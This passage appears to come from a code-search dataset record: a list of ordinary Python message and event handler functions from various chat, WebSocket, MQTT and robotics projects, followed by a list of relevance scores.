listen_to_message(**payload):\n\n data = payload['data']\n\n try:\n message = data['text']\n user = data['user']\n message_id = data['client_msg_id']\n time = data['event_ts']\n channel = data['channel']\n process_data({'user': user, 'message': message, 'message_id': message_id, 'channel': channel, 'time': time})\n except KeyError:\n pass\n except Exception as e:\n logging.error(e)\n return None", "def on_message(self, message):\n obj = json_decode(message)\n self.writing_logs(obj)\n return", "def onMessage(self, msg, binary):\r\n self._assembler.processMessage(msg, binary)", "def onMessage(self, msg):\n log.msg(str(msg))", "def send(self, event, message):\n pass", "def receive_message(self, context, message):\r\n pass", "def SendMessage(self, event):\n pass", "def process(self, msg):\n print \"HANDLER: received a msg: %s\" % msg", "async def websocket_receive(self, event):\n data_received = event.get('text')\n if not data_received:\n return\n\n data = json.loads(data_received)\n message = data['message']\n\n await self.new_message(message)", "def onMessage(self, payload, isBinary):", "def handle_message(self, message):\n\n\t\tself.console.handle_message(message)", "def eventInCallback(self, msg):\n rospy.loginfo(\"event_in msg received\")\n self.event_in = msg.data", "def on_message(self, event):\n event_data = EventData(message=event)\n if self._callback:\n self._callback(event_data)\n self.offset = event_data.offset\n return event_data", "def on_message(self, msg):\n self.log.info(msg)", "def on_message(self, userdata, message):\n logging.debug(f\"Message arrived from {message.topic}\")\n self.process(userdata, message)", "def on_message(self, ws, message):\n message = json.loads(message)\n if message['type'] == 'error':\n self.on_error(None, message['message'])\n elif message['type'] == 'subscriptions':\n print(\"Subscribed to {}\".format(', '.join([ channel['name'] for channel in message['channels'] ])))\n else:\n if ((message['type']=='ticker' and message['product_id'] in self._ticker) or \n (message['type'] in [\"snapshot\", \"l2update\"] and message['product_id'] in self._level2) or \n (message['type'] in [\"received\",\"open\",\"done\",\"match\",\"change\",\"activate\"] )):\n self.messages.append(message)\n elif message['type']=='heartbeat':\n self.updated_time = time.time()", "def receive_event(self):\n msg = self.msg_queue.get()\n\n # get the logical clock time of the machine that sent the message\n other_system_clock = msg[msg.index(\":\") + 1:] \n \n # set the clock time to the maximum of self's clock time and other \n # system's clock time\n self.clock_time = max(self.clock_time, int(other_system_clock))\n\n # increment the logical clock time and log that a message was received\n self.clock_time += 1\n self.log(\" Received message from \" + str(msg[:msg.index(\":\")]) + \n \" with LC time \" + str(msg[msg.index(\":\") + 2:]) + \n \"; messages left to process: \" + str(self.msg_queue.qsize()))", "def onMessage(self, msg, binary):\r\n# print('WebSocket: Received new message from client. 
'\r\n# '(binary={0})'.format(binary))\r\n\r\n try:\r\n self._assembler.processMessage(msg, binary)\r\n except InvalidRequest as e:\r\n self.sendErrorMessage('Invalid Request: {0}'.format(e))\r\n except DeadConnection:\r\n self.sendErrorMessage('Dead Connection')\r\n self.dropConnection()\r\n except:\r\n import traceback\r\n traceback.print_exc()\r\n self.sendErrorMessage('Fatal Error')", "def on_message(self, _, message):\n with self.message_lock:\n self.messages.append(Message.deserialize(message))\n self.new_message_available.set()\n super().on_message(_, message)", "def received(self, message):\n raise NotImplementedError()", "async def on_message(self, msg: Message):\n try:\n cmsg = await WechatyMessage(msg)\n except NotImplementedError as e:\n logger.debug(\"[WX] {}\".format(e))\n return\n except Exception as e:\n logger.exception(\"[WX] {}\".format(e))\n return\n logger.debug(\"[WX] message:{}\".format(cmsg))\n room = msg.room() # 获取消息来自的群聊. 如果消息不是来自群聊, 则返回None\n isgroup = room is not None\n ctype = cmsg.ctype\n context = self._compose_context(ctype, cmsg.content, isgroup=isgroup, msg=cmsg)\n if context:\n logger.info(\"[WX] receiveMsg={}, context={}\".format(cmsg, context))\n self.produce(context)", "def handle_message(self, data, channel):\n pass", "def handle_message(self, message):\n print(f\"Got message {message}\")\n if message >> 7 == 1:\n # String\n self.receive_char_array(message)\n elif message >> 3 == 0b00000:\n # Servo position\n self.receive_servo_position(message)\n elif message == 0b00001000:\n # All servo positions\n self.receive_all_servo_positions()\n elif message == 0b00001001:\n # All servo limits\n self.receive_all_servo_limits()\n elif message == 0b00001010:\n # Raw force reading\n self.receive_raw_force()\n print(f\"Handled message {message}\")", "def onMessageBegin(self, isBinary):", "def on_message(self, wsobj, message):\n\n message = json.loads(message)\n\n # If needed, complete the websocket handshake\n if message[\"op\"] == \"C\":\n self.on_open(wsobj, message=message)\n\n # The next few lines ensure only gameplay related event for the\n # specified game are provided. 
Otherwise, ESPN's websockets include\n # noisy league-wide information.\n elif \"pl\" in message:\n if message[\"pl\"] != \"0\" and message[\"tc\"] == self.channel:\n decoded = self.decode_message(message)\n self.write_message(wsobj, decoded)", "def on_message(self, room: Room, event: Dict) -> None:\n logger.debug(event)\n\n logger.info('stores msg in db')\n self.store_msg(event)\n\n if event['content'].get('msgtype') == 'm.text' and event['sender'] != \\\n self.uid:\n\n # add config to event\n event['config'] = self.config\n\n # gives event to mossbot and watching out for a return message\n msg = MOSS.serve(event)\n\n if msg and msg.data:\n\n if msg.type == 'text':\n logger.info('sending text msg...')\n room.send_text(msg.data)\n\n elif msg.type == 'notice':\n logger.info('sending notice msg...')\n room.send_notice(msg.data)\n\n elif msg.type == 'html':\n logger.info('sending html msg...')\n room.send_html(msg.data)\n\n elif msg.type == 'image':\n logger.info('sending image msg...')\n self.write_media('image', room, msg.data)\n\n else:\n logger.error(\n 'could not recognize msg type \"%s\"',\n msg[0]\n )\n\n elif msg and msg.type == 'skip':\n logger.info('skipping msg...')\n\n else:\n logger.debug('no matching in event')", "def on_message(self, msg) -> None:\n\n decoded_msg = json.loads(msg)\n message_type = decoded_msg[\"type\"]\n\n if message_type == MSG_SUBCRIPTIONS:\n\n product_ids = decoded_msg[\"channels\"]\n logging.debug(\"Subscriptions: {}\".format(product_ids))\n\n elif message_type == MSG_SNAPSHOT:\n\n product_id = decoded_msg[\"product_id\"]\n self._snapshot(decoded_msg)\n\n # Old best bid and ask doesn't exist yet, this will always set a new bbo\n self.set_if_new_bbo(product_id)\n\n elif message_type == MSG_L2UPDATE:\n\n product_id = decoded_msg[\"product_id\"]\n self.update(decoded_msg)\n\n self.set_if_new_bbo(product_id)\n\n self.event_count += 1", "def on_message(ws, msg):\n data = json.loads(msg)\n if \"results\" in data:\n # This prints out the current fragment that we are working on\n text = data['results'][0]['alternatives'][0]['transcript'].lower()\n print(text)\n # Pass it to the callback\n if CALLBACK(text):\n # If it recognized something, stop listening\n global RUNNING\n RUNNING = False", "def callback_botmessage(self, message):\n pass", "def callback_botmessage(self, message):\n pass", "def callback_botmessage(self, message):\n pass", "def on_message(\n self, client: mqtt.Client, userdata: typing.Any, msg: mqtt.MQTTMessage\n ) -> None:\n self.msgs.append(msg)", "def receiveMessage(self, user, message):\n pass", "def _r_on_incoming_message(self, string, protocol):\n #print(\"Incoming: %s\" % string)\n d = threads.deferToThread(parse_message_string, string)\n d.addCallback(self._r_handle_message_contents, protocol)", "def receive_message(self, message):\r\n self.state.receive_message(message)\r\n return", "def onMessageReceived(self, inputString):\n return", "def _messageReceived(self, message):\n topic = message[0]\n message = message[1:]\n self.messageReceived(message, topic)", "def on_message(ws, message):\n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n message_dict = message_to_dict(message)\n print('[' + st + '] Event in channel: ' + message_dict['channel'] +\n '. Created by user: ' + message_dict['user'] + '. 
Event Type: ' +\n str(message_dict['type']) + '.')\n handle_response(message_dict)", "def handle_message(self, data):\n message = Message.from_text(data)\n if message is not None:\n print(message.username, message.action, message.channel, message.content)\n self._callback(\"message\", message) # TODO: add additional callbacks", "def _on_mqtt_message(\n self, client: mqtt.Client, userdata: str, message: mqtt.MQTTMessage\n ) -> None:\n self.log.debug(f\"Received message on topic: {message.topic}\")\n self.inbound_message_listener(Message(message.topic, message.payload))", "def messageReceived(self, message):\n raise NotImplementedError(self)", "def on_msg(self, callback, remove=False):\n self._msg_callbacks.register_callback(callback, remove=remove)", "async def chat_message(self, event):\n message = event['message']\n await self.send_json({\n 'message': message\n })", "def on_watch_message(self, bus, msg):\n msg_struct = msg.get_structure()\n if msg_struct:\n if msg_struct.get_name() == 'GstMessageTag':\n codec_name = ((msg_struct[\"taglist\"].nth_tag_name(0)))\n codec_value = msg_struct[\"taglist\"].get_string(codec_name)\n info_name = codec_name\n c_result, info_value = codec_value\n if c_result:\n self.info_handler(info_name, info_value)\n if codec_name == \"video-codec\":\n self.info_handler(codec_name, info_value)\n r_result, width, height = self.get_resolution()\n if r_result:\n info_name = \"resolution\"\n info_value = \"[{}x{}]\".format(width, height)\n self.info_handler(info_name, info_value)\n bus.remove_signal_watch()", "def on_message(self, message):\n\n logger.debug('Data from client (%s)' % message)\n\n # A message string from the client.\n # Encode it and send it to the endpoint server as bytes.\n self.endpoint_stream.write(message.encode('utf-8'))", "def on_message(self, handler: Callable[[Request], Coroutine[Any, Any, Any]]):\n self.on_message_handler = handler", "async def on_chat_message(self, chat_message):\n pass", "def on_bus_message(self, bus, message):\n pass", "def onMessageEnd(self):", "def on_recv(self, callback):\n return self.message_client.on_recv(callback)", "async def event_message(ctx):\n\n # the bot should not react to itself\n if ctx.author.name.lower() == BOT_NICK.lower():\n return\n\n # relay message to command callbacks\n await bot.handle_commands(ctx)", "def process_chatter(self, msg):\n # note, nothing in here is ROS specific, it's just python code that\n # runs when new info appears\n\n print msg.data # print the recieved message\n\n self.msgs_recieved += 1 # increase msg count\n self.msgs_recieved %= 500 # mod 500 so we don't get enormous numbers\n self.msg = \"%d messages recieved\" % self.msgs_recieved # set message", "def _r_handle_message_contents(self, msg, protocol):\n if isinstance(msg, ResponseMessage):\n d = self._waiting_messages.pop(msg.response_to, None)\n if d is not None:\n d.callback(msg)\n elif isinstance(msg, ServerMotdMessage):\n print(\"Connected: %s\" % msg.motd)\n self._r_successful_connection()\n elif isinstance(msg, EventMessage):\n callback = self._event_callbacks.get((msg.service_name, msg.event_name))\n if callback is not None:\n threads.deferToThread(callback, *msg.pargs, **msg.kwargs)", "def handle_msg(self, state_id, msg):\n pass", "def sub_callbackmsg(self, msg):\n\n print (msg.message)\n self.received_msg = self.received_msg + [msg.message]\n print (self.received_msg)", "async def chat_message(self, event):\n await self.send(\n {'type': \"websocket.send\",\n 'text': event['response_data']}\n )", "def 
processReceivedMessage(iTag, clsName, msgID, msg): #@NoSelf", "def handle_received(self) -> None:\n self.buffer: bytes\n while self.buffer:\n try:\n request, self.buffer = parse_request(self.buffer)\n if request is None:\n _LOGGER.debug(\"Not enough data to parse request on event channel\")\n break\n\n _LOGGER.debug(\"Got message on event channel: %s\", request)\n\n # Send a positive response to satisfy the other end of the channel\n # TODO: Add public method to pyatv.http to format a message\n headers = {\n \"Content-Length\": 0,\n \"Audio-Latency\": 0,\n \"Server\": request.headers.get(\"Server\"),\n \"CSeq\": request.headers.get(\"CSeq\"),\n }\n response = (\n f\"{request.protocol}/{request.version} 200 OK\\r\\n\"\n + \"\\r\\n\".join(f\"{key}: {value}\" for key, value in headers.items())\n + \"\\r\\n\\r\\n\"\n )\n self.send(response.encode(\"utf-8\"))\n except Exception:\n _LOGGER.exception(\"Failed to handle message on event channel\")", "def on_message(self, message):\n # Not expecting any message\n if message is None:\n yield self._close_netconf()", "def onMessage(self):\n \"\"\"\n Validates that the received message is from a student and then broadcasts the message to the rest of the class.\n\n @param self: self is the instance of this object.\n @param message: the message that is received\n @param student: the student that sent the message\n \"\"\"\n pass", "async def on_socket_receive(self, msg: \"Msg | MsgProto\") -> None:", "def handle(self, message):\n for callback in self.callbacks:\n callback(message['data'])" ]
[ "0.8410868", "0.8254583", "0.7882204", "0.78618526", "0.7829602", "0.7802724", "0.773378", "0.7572389", "0.7512617", "0.74960405", "0.74841064", "0.74824226", "0.7457746", "0.7441775", "0.74085176", "0.73933196", "0.7379106", "0.7322716", "0.7322716", "0.730575", "0.729197", "0.729197", "0.7284595", "0.72838116", "0.72606355", "0.72436965", "0.7213562", "0.71948355", "0.71827555", "0.71697366", "0.7160725", "0.71404606", "0.70883834", "0.70781153", "0.70545596", "0.7035821", "0.7030046", "0.7030046", "0.7021371", "0.697039", "0.6944535", "0.6940851", "0.6920974", "0.69166934", "0.69108754", "0.69102657", "0.69082093", "0.68999183", "0.6898014", "0.68911606", "0.6887734", "0.68729603", "0.6863757", "0.6859718", "0.6853219", "0.68373764", "0.6832846", "0.68239325", "0.6817295", "0.68061733", "0.6802602", "0.67969847", "0.6794432", "0.67941475", "0.6787541", "0.67614484", "0.6761284", "0.6749756", "0.6749756", "0.6749756", "0.6733205", "0.67207634", "0.6694453", "0.6689608", "0.6682256", "0.6673972", "0.6661941", "0.6643456", "0.66421777", "0.66399395", "0.6635076", "0.6633131", "0.66217536", "0.6612692", "0.66111106", "0.6608964", "0.66087776", "0.65951335", "0.65847594", "0.6583949", "0.65721256", "0.6571512", "0.6568762", "0.6565291", "0.6559426", "0.65575755", "0.655179", "0.65497774", "0.6546588", "0.65455425", "0.6541651" ]
0.0
-1
all initialization jobs should be done here.
async def on_ready(self, payload: EventReadyPayload): log.info('ready event <%s>', payload) # 1. get all of friends friends: List[Contact] = await self.Contact.find_all() for friend in friends: log.info('load friend<%s>', friend) # 2. get all of rooms rooms: List[Room] = await self.Room.find_all() for room in rooms: log.info('load room<%s>', room)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _initJobs(self):\n pass", "def do_init(self):\n\n pass", "def _initialise_run(self) -> None:", "def initialize():\n manager.initialize()\n logs.exit_great_success()", "def _manually_initialize(self) -> None:\n # XXX: maybe refactor, this is actually part of the public interface\n pass", "def _post_init(self):\n pass", "def init():", "def _post_init(self) -> None:\n return", "def _initialize(self):\n self.send_init_command()", "def _real_initialize(self):\n pass", "def _initialize(self):\n pass", "def _initialize(self):\n pass", "def _initialize(self):\n pass", "def _afterInit(self):\n pass", "def post_init(self):\n\t\tpass", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def initialize(self):\n pass # pragma: no cover", "def initialise(self):", "def initialize(self):\n pass", "def initialize(self):\n pass", "def initialize(self):\n pass", "def initialize(self):\n pass", "def initialize(self):\n pass", "def initialise(self):\n self.set_up()", "def startUp(self):\n pass", "def initialize(self):\n\t\tpass", "def ready(self):\n # self.init_es_templete()\n self.init_uwsgi_log()", "def initialize(self):\r\n pass", "def initialize(self):\r\n pass", "def startup(self):\n if self.initialize_mp:\n self.initialize_multiprocessing()\n self.startup_run()\n self.startup_finish()", "def initialise(self):\r\n return", "def initialise(self):\r\n return", "def initialize(self):\n if not self._ready:\n self._real_initialize()\n self._ready = True", "def init_run(self):\n raise NotImplementedError", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def final_init(self, **kwargs):\n # Loading hierarchical settings and creating initial routine\n self.create_initial_routine(load_parameters=False)\n if self.autorun:\n # FIXME: if the init does not finish the object does not exist and\n # the routine results are not accessible\n try:\n self.run()\n self.post_run()\n except:\n log.error(\n \"Autorun failed to fully run, concluded routine steps \"\n \"are stored in the routine_steps attribute.\",\n exc_info=True,\n )", "def initialize(self,init):\n logger.info('*** initialize: worker id=%d',self._agent.wid)\n self.commands = {'initialize':None, 'before_do_work':None, 'after_do_work':None, 'finalize':None}\n self.commands.update(init.get(self._agent.wid,{}))\n exec_command(self.commands['initialize'])", "async def finalize_load(self) -> None:\n await asyncio.gather(_complete_init_tasks(), self.manager.init())", "def initialize(self):\n return", "def setUp(self):\n self.sc = init_orca_context(cores=4)", "async def init(self) -> None:", "async def init(self) -> None:", "def init():\n pass", "async def pre_action_init(self) -> None:", "def _call_initialization(self,\r\n input_fp,\r\n output_dir,\r\n params,\r\n job_prefix,\r\n poll_directly,\r\n suppress_submit_jobs):\r\n pass", "def _initialize_all():\n registry.clear_checkers()\n registry.clear_contexts()\n cli._register_internal_plugins.has_run = ( # pylint: disable=protected-access\n False\n )\n cli._register_internal_plugins() # pylint: disable=protected-access", "def work(self):\n self.config_file = self.args.config\n self.init_config()\n self.init_db()\n\n self.kickoff()", "def initialise(self):\n self.sc.init.exec_action(self.variables)", "async def initialize(self):", 
"def initialize(self):\n self.population.initialize()\n self.cache.initialize()\n if self.storage:\n self.storage.initialize()", "def user_init(self):\n pass", "def _init(self):\n pass", "def startup(self):\n pass", "def agent_init(self):\n pass", "def startup(self) -> None:", "def initialize(self):", "def initialize(self):", "def initialize(self):", "def initialize(self):", "def init(self):\r\n self._parse_options(self._force_args)\r\n self._maybe_daemonize()\r\n self._setup_modules()\r\n self._state = self.INITIALIZED", "def initialize(self) -> None:\n pass", "def _initialize_runners_startup(self):\n if self.command_group.is_cmd0_runner():\n self._initialize_runner(self.command_group.cmd0)\n if self.command_group.is_cmd1_runner():\n self._initialize_runner(self.command_group.cmd1)\n if self.command_group.is_cmd2_runner():\n self._initialize_runner(self.command_group.cmd2)", "def initialize(self, *args, **kwargs):\n self.initialized = True", "def init_batch(self):\n pass", "async def _setup(self):", "def _init(self, options):\n self._initRuntime(options)\n self._loadConfig() # needs runtime\n self._initGeneral() # needs _config\n self._initGroups() # needs _config and general", "def __init__(self):\n self._initialized = False\n self.init()", "def __init__(self):\n self._initialized = False\n self.init()", "def on_worker_init(self):\n self.import_default_modules()\n\n self.close_database()\n self.close_cache()", "def pre_init(self) -> None:\n self._check_and_set_network()\n self._check_and_apply_migrations()", "async def _init(self, **kwargs):", "def init(self) -> None:\n ...", "def _setup(self) -> None:\n\t\treturn", "def _child_init(self):\n self._create_init_gp()", "def initialization_step(self):\n # Update where agents are\n self.update_agent_location_vector()\n # update task locations\n self.update_task_location_vector()\n # update deadlines\n self.populate_deadline_vector()\n # update distances to each task and orientation to each task\n self.update_agent_distances_vector()\n self.update_agent_orientation_vector()", "def on_initialize(self) -> None:\n pass", "def on_init_start(self):\n for callback in self.callbacks:\n callback.on_init_start(self)", "def initService(self):", "def _initJobs(self):\n assert not hasattr(self, 'jobs'), '_initJobs should only be called once'\n\n conf = self.config.container_manager\n self.jobs = []\n\n job1 = LoopingCall(self.updateOurContainer)\n job1.start(float(conf.updateoursd_interval))\n self.jobs.append(job1)\n\n job2 = LoopingCall(self.retrieveContainer)\n job2.start(float(conf.retrievesd_interval))\n self.jobs.append(job2)\n\n job3 = LoopingCall(self.relationshipRedemption)\n job3.start(float(conf.redemption_hours))\n self.jobs.append(job3)", "def init(self):", "def init(self):", "def bootstrap(self):\n None", "def init_ca(self):\n self._init_dir()\n self._init_serial()\n self._init_keys()", "async def init(self):\n self.base_tamplates = {}\n self.preparing_task = None\n self.app = aioweb.Application()\n self.runner = aioweb.AppRunner(self.app)", "def init(): \n\tset_verbosity()\n\t_set_threads()\n\t_set_heartbeat()\n\t#_set_storage()\n\t\n\tinit_targets()\n\t\n\tsend_heartbeat(start=True)\n\t\n\tinfo_msg = \"init plugin script\"\n\tlogger.info(info_msg)\n\n\tinit_plugin()\n\n\tinfo_msg = \"loaded %s plugin(s)\" %(len(kb.plugins.handle))\n\tlogger.info(info_msg)", "def initialize(self, args):\n\t\tpass", "def _setup(self):\n pass", "def _setup(self):\n pass", "def _setup(self):\n pass", "def _setup(self):\n pass", "def _setup(self):\n pass", "def 
__init__(self):\n self.setup_called = False", "def _initJobs(self):\n super(DigestManager, self)._initJobs()\n conf = self.config.container_manager\n\n job4 = LoopingCall(self.performRequestedScan)\n job4.start(float(conf.activescan_interval))\n self.jobs.append(job4)", "def __init_on_load__(self):" ]
[ "0.7979565", "0.7962231", "0.7734526", "0.76368004", "0.7622692", "0.7585923", "0.7379355", "0.7354919", "0.73505986", "0.7327622", "0.7325596", "0.7325596", "0.7325596", "0.73226774", "0.7315183", "0.7215203", "0.7204069", "0.7199315", "0.7195699", "0.7195699", "0.7195699", "0.7195699", "0.7195699", "0.7164351", "0.71488863", "0.7142312", "0.7129774", "0.712093", "0.712093", "0.7087286", "0.7081747", "0.7081747", "0.7067055", "0.7059272", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7050465", "0.70414585", "0.7039609", "0.7029434", "0.701031", "0.6968422", "0.6968422", "0.6962912", "0.69627863", "0.69511366", "0.6949848", "0.6934405", "0.69313174", "0.6926279", "0.6920119", "0.6900095", "0.6891864", "0.68851614", "0.6870643", "0.6869097", "0.68687576", "0.68687576", "0.68687576", "0.68687576", "0.6861655", "0.68559986", "0.6841478", "0.6835739", "0.6825767", "0.68196225", "0.6807382", "0.68065506", "0.68065506", "0.68058753", "0.68025225", "0.68018156", "0.6800936", "0.67964745", "0.67886186", "0.6781493", "0.67709523", "0.67631406", "0.67575604", "0.6747489", "0.67365783", "0.67365783", "0.673502", "0.6729958", "0.6726825", "0.6713302", "0.66918194", "0.668709", "0.668709", "0.668709", "0.668709", "0.668709", "0.6684617", "0.6682519", "0.6677994" ]
0.0
-1
Run all dispatch tests
def dispatch(): suite = ServiceTestSuite() suite.addTest(unittest.makeSuite(Test, 'test_dispatch')) return suite
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def runTests(self):\n \n pass", "def doAllTests(self):\n # Initial offset\n self.getAlertsFile()\n self.offset = self.getOffset(self.config.get('PATHS', 'tempfile'))\n\n # Do all tests\n # As the socket is not persistent, client side attacks have to be done before all tests\n for module in self.modules:\n # Test is performed only if selected in config.cfg\n if self.config.get('TESTS', module[1]) == '1':\n print \"\\n%s\\n------------\" % module[0].upper()\n if module[1]=='clientSideAttacks':\n self.doClientSideAttacksTest( clientSideAttacks.ClientSideAttacks(self._target).getPayloads() )\n# elif module[1]=='multipleFailedLogins':\n# self.doMultipleFailedLoginsTest( multipleFailedLogins.MultipleFailedLogins(self._target).getPayloads() )\n else:\n self.doTest( module[1], eval( ('%s.%s'+'(self._target,self._cnf).getPayloads()') % (module[1], module[1][:1].upper()+module[1][1:]) ) )\n\n # Done!\n print \"\\n\\n-----------------------\"\n print \"DONE. Check the report.\"\n print \"-----------------------\\n\"", "def test_all():\n test_get_to()\n test_error_type()\n test_exchange()\n print(\"All tests passed.\")", "def main():\n run_test_all()", "def run_tests(self):\n raise NotImplementedError", "def runAll():\n\n loader = unittest.TestLoader()\n test_dir = pkg_resources.resource_filename('frvcpy.test','.')\n suite = loader.discover(test_dir)\n\n runner = unittest.TextTestRunner(verbosity=2)\n runner.run(suite)", "def run_tests(self):\n\n # log\n self.logger.debug('\\n\\nExecute test methods:\\n-----------------------------')\n\n # test methods start here\n # ------------------------------------------------------------------\n # ------------------------------------------------------------------\n\n # dummy_method\n self.dummy_method()\n\n # ------------------------------------------------------------------\n # ------------------------------------------------------------------\n # test methods end here\n\n # log\n self.logger.debug('\\n\\n-----------------------------\\nFinished test methods.')", "def run_all_unit_tests(cls):\n suites_list = []\n for test_class in cls.TESTS:\n suite = unittest.TestLoader().loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n result = unittest.TextTestRunner().run(unittest.TestSuite(suites_list))\n if not result.wasSuccessful() or result.errors:\n raise Exception(result)", "def run_all_tests(self):\n for index in range(len(self.__test_set_list)):\n self.run_test(index)", "def run_tests():\n \n test_constructor_positive()\n test_constructor_negative()\n test_game_move_positive()\n test_game_move_negative()\n test_game_move_edge()\n print(\"Congratulations ! 
You passed all the game test cases.\")", "def run_all(self):\n failures, errors = [], []\n\n # Run each test case registered with us and agglomerate the results.\n for case_ in self.cases:\n case_.run()\n update_results(failures, errors, case_)\n\n # Display our results.\n print_errors(errors)\n print_failures(failures)\n print_overview(errors, failures)\n\n # Exit with 0 if all tests passed, >0 otherwise.\n sys.exit(len(failures) + len(errors))", "def test_all():\n test_prepare_text()\n test_end_chat()\n test_choose_author()\n test_choose_book()", "def run_all_tests():\n remove_dbs()\n run_training_tests()\n run_custom_training_tests()\n run_training_save_tests()\n run_validation_tests()\n run_feature_extraction_tests()", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def run(self):\n if self.all:\n cmd = self.apply_options(self.test_all_cmd)\n self.call_and_exit(cmd)\n else:\n cmds = (self.apply_options(self.unit_test_cmd, (\"coverage\",)),)\n if self.coverage:\n cmds += (self.apply_options(self.coverage_cmd),)\n self.call_in_sequence(cmds)", "def tests():", "def RunAll():\n testfunctions = []\n for name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isfunction(obj) and name != 'RunAll':\n testfunctions.append(obj)\n\n # run all the functions\n for f in testfunctions:\n print('Running %s' % str(f))\n f()", "def run_code(self, test):\n for action in test:\n self.assertEquals(1, len(action))\n action_type, action = list(action.items())[0]\n\n if hasattr(self, \"run_\" + action_type):\n getattr(self, \"run_\" + action_type)(action)\n else:\n raise InvalidActionType(action_type)", "def runalltests():\n doctest.testmod()", "def _run_tests(self):\n for pyunit_testcase in self.cfg.testcases:\n yield self._run_testsuite(pyunit_testcase)", "def dispatch():\n suite = ServiceTestSuite()\n suite.addTest(unittest.makeSuite(AmazonTestCase, 'test_dispatch'))\n return suite", "def runtests():\n #- Load all TestCase classes from desistar/test/test_*.py\n tests = desistar_test_suite()\n #- Run them\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_all_tests(self) -> None:\n self.run_trt_precision_tests()\n logging.info(\"Check analysis result at: %s\", self._output_dir)", "async def run(self):\n print(\"\".join((\"-\" * 8, type(self).__name__, \"-\" * 8)))\n for method_name in dir(self):\n if not method_name.startswith(\"test\"):\n continue\n print(method_name, end=\"... 
\")\n try:\n await getattr(self, method_name)()\n except AssertionError:\n print(\"FAIL\")\n traceback.print_exception(*sys.exc_info())\n except Exception: # pylint: disable=broad-except\n print(\"ERROR\")\n traceback.print_exception(*sys.exc_info())\n else:\n print(\"PASS\")\n print()", "def runtest(self):", "def collectTests(self, global_ctx):\n pass", "def __main() :\n launchTests()", "def run(self) -> None:\n self.test_sanity()\n if self.has_errors():\n return\n\n tests: List[Callable[[], None]] = [\n self.test_headlines_predefined,\n self.test_headlines_required,\n self.test_headlines_dependencies,\n self.test_headlines_order,\n self.test_headlines_named_entities,\n self.test_named_entities,\n self.test_reading_attributes,\n self.test_forbidden_words,\n self.test_unwanted_words,\n self.test_police_abbreviations,\n self.test_spelling,\n self.test_grammar_rules_regex,\n ]\n\n for test in tests:\n if self.stop_on_error and self.has_errors():\n break\n test()", "def run():\n\tsubsuite_list = []\n\tfor _, modname, _ in pkgutil.iter_modules(test.__path__):\n\t\tif modname.startswith(\"test_\"):\n\t\t\tmodule = importlib.import_module('test.' + modname)\n\t\t\tsubsuite = unittest.TestLoader().loadTestsFromModule(module)\n\t\t\tsubsuite_list.append(subsuite)\n\tsuite = unittest.TestSuite(subsuite_list)\n\n\tprint(\"Testing:\\n\")\n\tunittest.TextTestRunner(verbosity=2).run(suite)", "def test():\n\n tests = unittest.TestLoader().discover('api/tests/', pattern='*/test_*.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def tests(context):\n black(context)\n isort(context)\n flake8(context)\n pylint(context)\n yamllint(context)\n pydocstyle(context)\n bandit(context)\n pytest(context)\n\n print(\"All tests have passed!\")", "def actionRunUnitTests():\n UnitTestRunner.init()\n \n for target in Settings.targets:\n for platform in Settings.targetPlatforms:\n for cpu in Settings.targetCPUs:\n for configuration in Settings.targetConfigurations:\n if not Summary.checkIfActionFailed(ACTION_BUILD, target, platform, cpu, configuration):\n Logger.printStartActionMessage('Running unit tests for ' + target + ' ' + platform + ' ' + cpu + ' ' + configuration, ColoredFormatter.YELLOW)\n result = UnitTestRunner.run(target, platform, cpu, configuration)\n Summary.addSummary(ACTION_RUN_UNITTESTS, target, platform, cpu, configuration, result, UnitTestRunner.executionTime)\n if result != NO_ERROR:\n Logger.printEndActionMessage('Failed to execute unit tests!')\n else:\n Logger.printEndActionMessage('Executed all unit tests')", "def run_tests(self):\n with self.report.timer.record(\"run\"):\n self.result.report.extend(self._run_tests())", "def runAllTests():\n\tttr = unittest.TextTestRunner(verbosity=3).run(suite())\n\tnTests = ttr.testsRun + len(ttr.skipped)\n\tprint(\"Report:\")\n\tprint(\"\\t\" + str(len(ttr.failures)) + \"/\" + str(nTests) + \" failed\")\n\tprint(\"\\t\" + str(len(ttr.errors)) + \"/\" + str(nTests) + \" errors\")\n\tprint(\"\\t\" + str(len(ttr.skipped)) + \"/\" + str(nTests) + \" skipped\")", "def test_methods(self):\n\n #log\n self.logger.debug('\\n\\nExecute test methods:\\n-----------------------------')\n\n\n \n #test methods here\n #------------------------------------------------------------------\n\n #dummy_method\n self.dummy_method()\n\n #------------------------------------------------------------------\n\n\n\n #log\n self.logger.debug('\\n\\n-----------------------------\\nFinished test methods.')", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def 
test_methods(self):\n\n #log\n self.logger.debug('\\n\\nExecute test methods:\\n-----------------------------')\n\n\n \n #test methods here\n #------------------------------------------------------------------\n\n #dummy_method\n self.dummy_method()\n\n #stylesheet_test\n #self.stylesheet_test(self.wdgt_explanation)\n\n #------------------------------------------------------------------\n\n\n\n #log\n self.logger.debug('\\n\\n-----------------------------\\nFinished test methods.')", "def RunTestAll(ss):\n ss.StopNow = False\n ss.TestAll()\n ss.Stopped()", "def run_tests(tests):\n return [test(t) for t in tests]", "def dispatch():\n app.run()", "def runTest(self):\n\t\tself.setUp()\n\t\tself.test_postopProgramming1()", "def main():\n # add all new test suites per test module here\n suite_date = test_date.suite()\n suite_ng = test_ng.suite()\n suite_page = test_page.suite()\n suite_container = test_container.suite()\n\n # add the suite to be tested here\n alltests = unittest.TestSuite((suite_date,\n suite_ng,\n suite_page,\n suite_container))\n\n # run the suite\n runner = unittest.TextTestRunner()\n runner.run(alltests)", "def __run_test_methods(self):\n for test_method in self.runnable_test_methods():\n\n result = 